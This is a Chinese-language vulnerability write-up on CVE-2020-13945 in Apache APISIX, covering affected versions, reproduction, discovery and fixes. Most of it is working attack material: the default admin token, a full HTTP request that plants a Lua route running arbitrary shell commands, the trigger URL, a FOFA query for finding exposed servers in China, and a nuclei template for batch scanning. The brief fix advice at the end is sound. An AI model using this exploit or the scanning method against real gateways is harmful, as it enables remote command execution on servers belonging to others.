0x01 漏洞描述

Apache APISIX是一个高性能API网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。
当使用者开启了Admin API,在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
影响版本:

  • Apache APISIX 1.2
  • Apache APISIX 1.3
  • Apache APISIX 1.4
  • Apache APISIX 1.5

    0x02 漏洞复现

利用默认Token增加一个恶意的router,其中包含恶意LUA脚本,增加字段X-API-KEY: edd1c9f034335f136f87ad84b625c8f1

  1. POST /apisix/admin/routes HTTP/1.1
  2. Host: ip:9080
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.39
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  9. X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
  10. Content-Type: application/json
  11. Connection: close
  12. Content-Length: 406
  14. {
  15.     "uri": "/attack",
  16. "script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
  17.     "upstream": {
  18.         "type": "roundrobin",
  19.         "nodes": {
  20.             "example.com:80": 1
  21.         }
  22.     }
  23. }

image.png
访问添加的路由/attack?cmd=<command>
image.png
删除添加的路由规则:DELETE /apisix/admin/routes/{id}
image.png

0x03 漏洞发现

端口:9080
访问不存在的路由:{"error_msg":"404 Route Not Found"}
image.png
访问 /apisix/admin/:{"error_msg":"failed to check token"}
image.png
fofa语法:port=”9080” && body=”Route Not Found” && country=”CN”
nuclei模板:

  1. id: CVE-2020-13945
  3. info:
  4. name: Apache APISIX's Admin API Default Access Token (RCE)
  5. author: pdteam
  6. severity: medium
  7. description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.
  8. reference:
  9. - https://nvd.nist.gov/vuln/detail/CVE-2020-13945
  10. - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
  11. tags: cve,cve2020,apache,apisix,rce,intrusive
  12. classification:
  13. cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
  14. cvss-score: 6.50
  15. cve-id: CVE-2020-13945
  17. requests:
  18. - raw:
  19. - |
  20. POST /apisix/admin/routes HTTP/1.1
  21. Host: {{Hostname}}
  22. X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
  23. Content-Type: application/json
  25. {
  26. "uri":"/{{randstr}}",
  27. "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f =        assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
  28. "upstream":{
  29. "type":"roundrobin",
  30. "nodes":{
  31. "example.com:80":1
  32. }
  33. }
  34. }
  36. - |
  37. GET /{{randstr}}?cmd=id HTTP/1.1
  38. Host: {{Hostname}}
  40. matchers-condition: and
  41. matchers:
  42. - type: word
  43. words:
  44. - '"action":"create"'
  45. - '"script":'
  46. - '"node":'
  47. condition: and
  49. - type: status
  50. status:
  51. - 201
  53. extractors:
  54. - type: regex
  55. regex:
  56.           - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

nuclei批量检测:
image.png

0x04 修复建议

  1. 修改Apache APISIX配置文件中 conf/config.yaml 的admin_key,禁止使用默认Token
  2. 若非必要,关闭Apache APISIX Admin API功能,或者增加IP访问限制。
  3. 升级Apache APISIX 至最新版本。